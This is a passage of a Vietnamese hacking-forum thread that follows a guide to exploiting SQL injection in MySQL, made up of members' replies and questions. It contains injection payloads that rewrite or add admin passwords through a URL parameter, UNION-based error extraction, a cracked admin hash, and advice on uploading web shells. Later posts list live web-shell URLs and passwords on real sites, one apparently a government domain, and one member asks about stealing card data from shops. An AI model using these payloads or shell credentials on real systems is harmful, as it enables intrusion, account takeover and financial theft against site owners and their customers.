banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Hướng dẫn khai thác SQL Injection đối với MySQL  XML
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 03/03/2012 20:26:15 (+0700) | #91 | 256770
zeropoint
Member

[Minus]    0    [Plus]
Joined: 14/02/2012 08:11:31
Messages: 24
Offline
[Profile] [PM]

caotrienx wrote:
Mình hack được user/pass: admin:57c4b03b07d5b098b92a0205dcca66d5 chuỗi md5 này ko giải mã được

Theo 1 bài viết có cách hướng dẫn đổi pass hoặc record 1 newuser/newpass(newpass được đã được giải mã) khi biết được các table va column
Để thay đổi password , có thể làm như sau:
http://yoursite.com/index.php?id=10 UPDATE 'admin_login' SET 'password'= 'newpass' WHERE login_name='admin'--

Hoặc nếu bạn muốn một record mới(tạo một newuser/newpass) vào table:
http://yoursite.com/index.php?id=10 INSERT INTO 'admin_login'('login_id', 'login_name', 'password') VALUES(`1`,'admin1','newpass')--

mình thử nhưng ko được kể cả khi chuyển login_name sang hex newuser=admin1=61646d696e31

INSERT INTO 'admin_login' ('login_id', 'login_name', 'password') VALUES
(`1`, `0x61646d696e31`, `bf15876b12c0a194dcb842c3ec9cb078`)--

Ai cho mình biết sai ở đâu ko! 

Nói chung MySQL không phân biệt được lệnh bạn viết gì! vì phía sau select mà thêm câu lệnh insert,update, delete là sai vì phía sau nó là where hoặc union nói đơn giản là Nên học câu lệnh truy vấn trong SQL đi!
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 07/03/2012 01:55:00 (+0700) | #92 | 257067
onelove88
Member

[Minus]    0    [Plus]
Joined: 04/08/2011 11:50:31
Messages: 2
Offline
[Profile] [PM]
cho em hỏi cái em dùng SQL sever 2005 ,em dùng phần mềm SQL Server Management Studio Express để code

em dùng câu lệnh sau:
select * from san_Pham union select convert(int,GardenpassWorld+'a'),'1','1','1','1','1','1' from admin_Garden

lỗi hiên trên SQL Server Management:
Conversion failed when converting the nvarchar value '123456a' to data type int.

nhưng khi em chèn mã lệnh vào :http://localhost/theGarden/DetailProduct.aspx?id=7 union select convert(int,GardenpassWorld+'a'),'1','1','1','1','1','1' from admin_Garden

lôi hiên trên trình duyệt: Incorrect syntax near 'a'.
cho em hỏi sao lại báo lỗi khác nhau thế ạ ,vì câu lệnh sau thì báo lỗi giống nhau

select * from san_Pham union select stuff(GardenpassWorld,1,1,'a'),'1','1','1','1','1','1' from admin_Garden

Conversion failed when converting the nvarchar value 'a23456' to data type int.

Em đánh sai gì mong các anh thông cảm
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 13/04/2012 10:09:34 (+0700) | #93 | 261295
[Avatar]
thanhhuy12th
Member

[Minus]    0    [Plus]
Joined: 11/04/2012 21:23:23
Messages: 1
Offline
[Profile] [PM] [Yahoo!]
Bài viết rất hay để tham khảo nhưng:

"From: louisnguyen27: @seamoun như vậy social engineering là rất quan trọng trong việc khai thác lỗi. Có khi nào đoán hoài mà vẫn không ra tên bảng và các trường không?"

Lúc đầu có lỗi " chỗ sau id=1 thêm ' " thì mới khai thác lỗi được, còn không nếu không xuất hiện thì......Never nhĩ???
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 14/04/2012 19:27:52 (+0700) | #94 | 261398
zeropoint
Member

[Minus]    0    [Plus]
Joined: 14/02/2012 08:11:31
Messages: 24
Offline
[Profile] [PM]
Một câu hỏi rất hay chủ yếu là ta phải đoán được họ dùng câu lệnh truy vấn như thế nào và họ fix chưa? Nếu fix rồi thì đoán cách họ đang fix từ đó ta mới quyết định đi tiếp hay dừng lại!

Bài viết chỉ mang tính tổng quang mà thôi còn việc áp dụng thì còn phải dự vào bản thân và kinh nghiệm về truy vấn Cơ Sở Dữ Liệu nữa!

[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 01/05/2012 19:41:12 (+0700) | #95 | 262259
chimung
Member

[Minus]    0    [Plus]
Joined: 23/10/2008 22:23:45
Messages: 24
Offline
[Profile] [PM]
E thấy chủ đề hay thế này mà có nhiều câu hỏi vu vơ quá nên mạo muội hỏi các bậc đàn anh:"Ngoài việc dùng order by để tìm số cột lỗi còn có cách khác ko?"
P/s:Sao người viết lại sử dụng union select 1,1,1,1,... để xác định cột lỗi thay vì union select 1,2,3,4 vậy?
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 02/05/2012 08:20:12 (+0700) | #96 | 262293
havuanhle
Member

[Minus]    0    [Plus]
Joined: 27/03/2011 01:32:03
Messages: 4
Offline
[Profile] [PM]
Khi get user name với database name, nhưng get table lại dính 403 thì làm sao nhỉ?
Và một số site khi query lại hiện trang trắng kèm lỗi, có cách nào khai thác được không ạ
Mong các bác giải đáp.
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 04/06/2012 10:05:47 (+0700) | #97 | 264598
[Avatar]
anti-love
Member

[Minus]    0    [Plus]
Joined: 30/04/2012 12:08:18
Messages: 9
Offline
[Profile] [PM]
Thực ra bài viết này rất bổ ích
nhưng trường hợp lỗi SQL kiểu này thì chỉ xuất hiện ở một số wwebsite nhỏ, có cơ chế bảo mật không tốt.
chứ nhưng site to con thì hầu như không thể khai thác đc SQL kiểu này
Mà phải tìm qua lỗi củA Email admin hoặc used của member để khai thác.
luk nào có thời gian mình sẽ post lên cho mọi người tham khảo
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 28/06/2012 18:20:47 (+0700) | #98 | 265713
zeropoint
Member

[Minus]    0    [Plus]
Joined: 14/02/2012 08:11:31
Messages: 24
Offline
[Profile] [PM]
Đâu nhất thiết phải tìm cột đâu bạn? Không cần biết cột vẫn có thể truy vấn dữ liệu được mà!(blind)

Còn tại sao select 1,1,... khác select 1,2,... thì bạn cứ thử đi rồi bạn sẽ thấy khác biệt.
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 28/06/2012 21:34:57 (+0700) | #99 | 265720
zeropoint
Member

[Minus]    0    [Plus]
Joined: 14/02/2012 08:11:31
Messages: 24
Offline
[Profile] [PM]
This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members.
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 29/06/2012 12:43:00 (+0700) | #100 | 265764
kakarottbatdong
Member

[Minus]    0    [Plus]
Joined: 02/05/2009 19:27:06
Messages: 55
Offline
[Profile] [PM]
This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members.
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 14/04/2013 18:17:30 (+0700) | #101 | 274935
khicon2893
Member

[Minus]    0    [Plus]
Joined: 17/01/2013 22:10:29
Messages: 1
Offline
[Profile] [PM]
e8772a36a8f284c2060a70d16cb7d03a -> DAITHIENSON
MD5 !! dùng findmyhash mà giải mã cậu ah!!
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 15/04/2013 08:51:02 (+0700) | #102 | 274947
Kikirum
Member

[Minus]    0    [Plus]
Joined: 07/07/2011 08:33:44
Messages: 1
Offline
[Profile] [PM]

khicon2893 wrote:
e8772a36a8f284c2060a70d16cb7d03a -> DAITHIENSON
MD5 !! dùng findmyhash mà giải mã cậu ah!! 

Dạo này còn hack shop lấy đc cc không bác, mình đọc mấy ebook của hieupc ,tìm hiểu thêm trên mạng nữa , shop lỗi thì tìm ra nhưng mà làm theo mấy cái code của hiếu pc thì nó chẳng ra cái colum nào cả. hic...
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 07/05/2013 08:26:55 (+0700) | #103 | 275513
manh.kqha
Member

[Minus]    0    [Plus]
Joined: 23/04/2013 03:14:15
Messages: 9
Offline
[Profile] [PM]
Anh Ad ơi.
Ngoài hướng khai thác lỗi thông qua kiểm tra bằng dấu "'" sau chuỗi truy vấn này, về SQL Injection có những hướng khác không?
Ad hướng dẫn anh em các phương pháp khác đi.
Bây giờ tìm được mội site mắc lỗi này đề test cũng không dễ.
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 07/05/2013 12:22:46 (+0700) | #104 | 275525
hacking.zombie
Member

[Minus]    0    [Plus]
Joined: 19/03/2013 22:39:42
Messages: 5
Offline
[Profile] [PM]
Bây giờ mình thấy đều sử dụng framework để truy xuất database ví dụ django của python, rail của ruby,.. vậy tại sao vẫn bị lỗi SQL ??? Mình lập trình ứng dụng mạng nhưng mới chạy local host không hề có đoạn code SQL nào.
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 22/06/2013 09:14:09 (+0700) | #105 | 276783
ken002
Member

[Minus]    0    [Plus]
Joined: 12/01/2009 14:16:40
Messages: 29
Offline
[Profile] [PM]
Vậy nếu url đã rewrite thì làm thế nào hả bác?
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 26/06/2013 05:44:40 (+0700) | #106 | 276912
sparrowvn
Member

[Minus]    0    [Plus]
Joined: 12/03/2012 21:21:05
Messages: 12
Offline
[Profile] [PM]
URL rewrite cũng khai thác như bình thường ban xem link này nhé https://www.youtube.com/watch?v=ROu2DclkMAY, mặc dù link cũ nhưng vẫn thế. Mình đã check site này vẫn đang bị sql nhưng ngạc nhiên là vẫn được báo là Vulnerability free. Hài thật
Test lỗ hổng web : http://iwast.securitas.com.vn
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 11/11/2013 20:08:06 (+0700) | #107 | 278988
hocquantrimang
Member

[Minus]    0    [Plus]
Joined: 05/11/2013 22:58:19
Messages: 2
Offline
[Profile] [PM]
đối với bài này là làm bằng tay nên có thể hơi mất công và khó nhớ, nhưng làm = tay cung có cái hay của làm bằng tay, nhiều khi làm = tools ko ra nhưng làm bằng tay lại ra. với bài này thì ta có thể dùng tools Havij để search sẽ rất nhanh có thể thấy được admin và mkMD5, cả link admin nữa, nhưng mã MD5 thì hên xui thôi, xài python trong backtrack còn xin lỗi chịu ko nổi chứ nói gì đến google mêt nghỉ, xài dictionary thì cũng 50/50 :v ko nói chắc được, vậy nên việc tìm kiếm password của admin thì mức độ khả thi vẫn là 50-50/ thế nên mới sinh ra việc khai thác web cho phép upload để đưa shell lên rồi chạy shell để chiếm quyền admin sau đó change pass của admin = pass đã được MD5 của mình vào, => mình là admin rồi , từ đó mới tấn côn các web khác. nhưng chỉ riêng việc upshell và chạy được nó đã là 1 điều ko đơn giản rồi.
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 19/11/2013 23:38:50 (+0700) | #108 | 279040
sparrowvn
Member

[Minus]    0    [Plus]
Joined: 12/03/2012 21:21:05
Messages: 12
Offline
[Profile] [PM]

hocquantrimang wrote:
đối với bài này là làm bằng tay nên có thể hơi mất công và khó nhớ, nhưng làm = tay cung có cái hay của làm bằng tay, nhiều khi làm = tools ko ra nhưng làm bằng tay lại ra. với bài này thì ta có thể dùng tools Havij để search sẽ rất nhanh có thể thấy được admin và mkMD5, cả link admin nữa, nhưng mã MD5 thì hên xui thôi, xài python trong backtrack còn xin lỗi chịu ko nổi chứ nói gì đến google mêt nghỉ, xài dictionary thì cũng 50/50 :v ko nói chắc được, vậy nên việc tìm kiếm password của admin thì mức độ khả thi vẫn là 50-50/ thế nên mới sinh ra việc khai thác web cho phép upload để đưa shell lên rồi chạy shell để chiếm quyền admin sau đó change pass của admin = pass đã được MD5 của mình vào, => mình là admin rồi , từ đó mới tấn côn các web khác. nhưng chỉ riêng việc upshell và chạy được nó đã là 1 điều ko đơn giản rồi.  

Do trong giới hạn của bài viết và yêu cầu, nên mình không muốn bình phẩm về chuyện tay hay tool. Về nguyên tắc thì tất cả những gì user có thể input đều sẽ được đưa vào ứng dụng, tuỳ theo ứng dụng có thể điểm input sẽ khác nhau và tất nhiên tuỳ theo khả năng nhận biết cùa hacker hoặc người muốn test. Skill và experience là những yếu tố mấu chốt đối với tester cũng như hacker
Về chuyện tool hay tay, các bạn có thể xem 1 bài viết (khá cũ nhưng vẫn xem được) tại http://www.slideshare.net/itasvietnam/itasautomated-web-applicationscannervi. Các quyết đị tool nào hay tay nào sẽ là quyết định của chính bạn
Test lỗ hổng web : http://iwast.securitas.com.vn
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 09/12/2013 21:54:55 (+0700) | #109 | 279198
[Avatar]
vipluckystar
Member

[Minus]    0    [Plus]
Joined: 13/12/2011 10:08:18
Messages: 1
Offline
[Profile] [PM] [Yahoo!]
Cho mình hỏi mình chiếm quyền quản trị và upload shell thành công nhưng lại ko login được vào shell dù đã đúng user/pass hay bỏ code check đi thì phải làm sao?
demo:
http://pscells.net/upload/sanpham12.php hacker
http://pscells.net/upload/sanpham18.php imhacker/fogetit
http://pscells.net/upload/test.php /
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 28/04/2014 13:46:40 (+0700) | #110 | 280497
hackermiennui
Member

[Minus]    0    [Plus]
Joined: 24/04/2014 08:31:17
Messages: 1
Offline
[Profile] [PM]
http://thutuchanhchinh.daknong.gov.vn/uploads/files/T4_2014/shell.asp
pass: a1b
Làm gì khi có cái này
[Up] [Print Copy]
  [Article]   Hướng dẫn khai thác SQL Injection đối với MySQL 09/08/2014 22:27:05 (+0700) | #111 | 281257
[Avatar]
mrminhlong
Member

[Minus]    0    [Plus]
Joined: 07/08/2014 00:20:41
Messages: 1
Offline
[Profile] [PM]
các bác có nghĩ là 1 site có lỗi SQL injec nhưng lại không tìm đk table users của nó không? em tình cờ khai thác đk lỗi này trên 1 site nhưng khi truy vấn thì không thấy users smilie
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|